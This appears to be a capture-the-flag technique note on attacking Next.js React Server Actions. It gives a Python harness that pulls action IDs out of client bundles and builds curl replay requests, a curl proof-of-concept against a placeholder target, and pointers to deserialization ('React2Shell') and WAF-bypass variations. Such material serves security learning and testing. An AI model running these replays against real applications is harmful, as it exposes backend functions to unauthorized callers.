Note
web
javascript
nextjs
react-server-actions
rsc
deserialization
Replay Server Action calls out of band to reach callable backend functions when IDs, serialization, and WAF behavior line up.
Next.js / React Server Actions / React2Shell
Server Actions create a structured server-call surface that looks opaque at first, but can expose callable backend functions if IDs, serialization, and WAF behavior line up.
Why It Matters
- Action endpoints can be replayed directly, turning hidden backend functions into a reachable attack surface.
Vulnerable Pattern
- Next.js apps exposing Next-Action request headers, text/x-component responses, or other React Server Component traffic that can be captured and replayed out of band.
Exploit Flow
- Fingerprint whether the target really uses Server Actions and whether requests can be replayed with curl.
- Enumerate or steal action identifiers from HTML, RSC responses, or client JS bundles.
- If the action accepts structured input, test deserialization edge cases, arguments that reach file reads, and gadgetized object graphs.
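The three steps above, as an added Python harness that is not part of the original note or of any Next.js tooling: it pulls candidate action IDs out of a constructed bundle fragment (client components wire actions through createServerReference, which is why IDs land in public JS and SSR HTML), builds the out-of-band replay request with the headers a browser-issued Server Action call carries, and fingerprints a reply as an RSC flight payload. The bundle text and flight reply are constructed samples, https://target/ is a placeholder, and the 40-to-42-hex-character ID length is an assumption about common builds.

```python
import json
import re

# Constructed sample of a Next.js client bundle fragment (not from a real target).
# Client components reference Server Actions through createServerReference("<id>", ...),
# so action IDs leak into public JS bundles and server-rendered HTML.
SAMPLE_BUNDLE = """
(0,n.createServerReference)("7f1c9e0b2c2e9b3f0a1d5c4e8b6a7f9d0c3e2b1a",n.callServer,void 0,n.findSourceMapURL,"deleteUser");
var x=createServerReference("00a3b2c1d0e9f8a7b6c5d4e3f2a1b0c9d8e7f6a5b4",callServer);
"""

# Action IDs are hex digests derived at build time; assumption: 40 hex chars in older
# builds and 42 in newer ones, so the range covers both.
ACTION_ID_RE = re.compile(r'createServerReference\)?\(\s*"([0-9a-f]{40,42})"')


def extract_action_ids(text):
    """Return distinct action IDs found in a bundle/HTML fragment, in order of appearance."""
    seen = []
    for m in ACTION_ID_RE.finditer(text):
        if m.group(1) not in seen:
            seen.append(m.group(1))
    return seen


def build_replay(url, action_id, args=()):
    """Describe the out-of-band replay of a Server Action as method/headers/body.

    The body is the JSON array of arguments the action would receive; Next-Action
    selects the function, and Accept mirrors what the browser client sends."""
    return {
        "method": "POST",
        "url": url,
        "headers": {
            "Next-Action": action_id,
            "Content-Type": "text/plain;charset=UTF-8",
            "Accept": "text/x-component",
        },
        "body": json.dumps(list(args)),
    }


def to_curl(req):
    """Render the replay as a curl command line for manual testing."""
    parts = ["curl", "-sS", "-X", req["method"], "'%s'" % req["url"]]
    for k, v in req["headers"].items():
        parts += ["-H", "'%s: %s'" % (k, v)]
    parts += ["--data", "'%s'" % req["body"]]
    return " ".join(parts)


# RSC flight payloads are line-oriented: each row starts with a row id and a colon.
FLIGHT_LINE_RE = re.compile(r"^[0-9a-f]+:", re.MULTILINE)


def looks_like_server_action_response(content_type, body):
    """Fingerprint a reply as a Server Action / RSC response: text/x-component
    content type plus flight-format rows such as '0:{"a":"$@1",...}'."""
    media_type = content_type.split(";")[0].strip().lower()
    return media_type == "text/x-component" and bool(FLIGHT_LINE_RE.search(body))


# Constructed example of a flight-format reply, used only for the fingerprint check.
SAMPLE_FLIGHT = '0:{"a":"$@1","f":"","b":"abc123"}\n1:null\n'


if __name__ == "__main__":
    for aid in extract_action_ids(SAMPLE_BUNDLE):
        print(to_curl(build_replay("https://target/", aid)))
    print(looks_like_server_action_response("text/x-component", SAMPLE_FLIGHT))
```

Replay each recovered ID with an empty argument array first: a flight-format reply with a non-error row confirms the ID is live for this build, while an HTML or 404 reply usually means the ID belongs to a different deploy. Only then move on to structured arguments.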
Variations
- React2Shell (RSC deserialization), raw action replays, RSC boundary confusion, or WAF bypasses that allow payloads only in specific encodings.
Common Blockers
- Action IDs bound to build versions or sessions (they change on every deploy), CSRF defenses, and WAFs blocking obvious serialized-payload markers.
PoC Sketch
curl https://target/action \
-H 'Next-Action: <action-id>' \
-H 'Content-Type: text/plain;charset=UTF-8' \
--data '[]'
Good Situations To Use It
- A Next.js app exposes Server Action traffic.
- Action IDs are recoverable and replayable.
- Actions accept structured/serialized input.
Sources
ehaxctf2026/web/flight_risk